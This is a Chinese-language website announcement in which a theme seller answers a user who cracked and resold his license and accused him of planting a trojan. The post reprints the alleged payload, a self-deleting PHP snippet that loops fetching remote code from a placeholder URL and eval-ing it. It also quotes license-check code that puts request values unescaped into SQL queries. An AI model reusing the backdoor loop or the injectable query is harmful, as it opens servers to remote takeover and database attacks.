【网站公告】关于520xd这个奇葩

起因

首先他是一个Tint-K的普通用户,因购买了Tint-K并破解了我的授权文件,发现后QQ联系他,他承认破解成功,因为我的授权文件并没有特别的加密,用的就是普通的混淆,我没必要搞得太复杂,因为本身就是破解主题,也不想搞多么复杂的防破解,想玩破解的破解就是了,我不介意的。但是破解了,发现倒卖,难道我不应该取消他的授权和技术支持吗?难道我还要继续提供更新服务和支持?当然不可能,取消他的授权,T他出群本身就是合理的。他在QQ上说了,加密太弱,分分钟被他破解(本来就对加密没怎么上心,爱破解破解去),然后又说用的这个授权系统他有份开发,然后还给我推荐加密方法(其实我心里面是呵呵的),小照授权系统是我在贴吧发现的,作者原帖也说是他一人开发,具体是不是也懒得去深究,跟我也没关系。原帖地址:https://tieba.baidu.com/p/5006400971?red_tag=3146464501

对于他污蔑的解释

今天看到他的文章,哈哈,这家伙开启了污蔑模式,他要真是授权系统开发者怎么会不知道那返回的数据是什么,原理又是什么。
下面是他原文中贴出的授权系统代码:

	if($conf['auth_ma']==1){
		if($DB->get_row("SELECT *  FROM  `". DBQZ ."_list` where `url` = '{$get_url}' and `authorization` = '{$get_authorization}' limit 1")){
			$arr = array('code'=>'1');
			exit(json_encode($arr));
		}else{
			$arr = array('code'=>'-1','msg'=>'The domain name is not authorized, please contact customer service QQ:'.$conf['kfqq'].'Authorize.');
			exit(json_encode($arr));
		}
	}else{
		if($DB->get_row("SELECT *  FROM  `". DBQZ ."_list` where `url` = '{$get_url}' limit 1")){
			$arr = array('code'=>'1');
			exit(json_encode($arr));
		}else{
			$arr = array('code'=>'-1','msg'=>'The domain name is not authorized, please contact customer service QQ:'.$conf['kfqq'].'Authorize.');
			exit(json_encode($arr));
		}
	}

不知道大家看不看得懂,这几行代码很简单,通过查询数据库的授权列表,判断当前域名是否授权,如果已授权则返回状态码1,则通过授权打开网站,如果未授权,则返回-1,并返回授权失败的提示文字,这里的文字,我换成了网页,也就是为了好看一点,因为是网页源码,所以后面显示\n\n\n\n,至于他说什么给服务器放木马什么的,哎哟,真搞笑额,这个网页源码是直接返回给网页用户的,而不是服务器,那又怎么给服务器众木马呢?好一个厉害的开发者,不是你开发的吗?你怎么不知道这是返回给客户端的?
补充一下他贴出来的这个代码:

{"code":"1","msg":"
<?php
unlink($_SERVER['SCRIPT_FILENAME']);
ignore_user_abort(true);
set_time_limit(0);
$remote_file = 'http://xxx/xxx.txt';
while($code = file_get_contents($remote_file)){
@eval($code);
sleep(5);
};
?>"}

不知道他在哪儿找来的,首先这样写就是错误的,根本运行不了,引号内放入PHP代码,哪个老师教的可以这样写,其次这是服务端的代码,你怎么知道我这样写的?手动滑稽,而且也说了,这里的数据是返回给客户端网页的,用于替换用户浏览未授权的域名的页面,如果是文字就展示文字,如果是网页源码,就展示一个网页,本站内有原版的授权系统下载,有兴趣的可以去下载看看。
也许这样贴出来更直观:
【网站公告】关于520xd这个奇葩 网站公告 第1张
如图所示,就是一个未授权的提示页面,这个页面可以自定义,用户访问未授权的域名时显示的,而不是所谓的返回给服务器。
至于为什么会显示成/n/n的格式,看上面图片有换行吧,/n代表换行的意思,示例:

http://auth.kuacg.com/Ajax.php?my=query_API&url=123&value=123

打开这个网址,直接看就是像他说的那样/n/n/n,但是右键查看源代码,就可以看到是什么东西了,如下图,与上面图中的代码是一致的,只是中文被转义了,回车和空格被处理成了代码
【网站公告】关于520xd这个奇葩 网站公告 第2张

还有啊,说什么可以分分钟登陆我后台,来登录好了

参与评论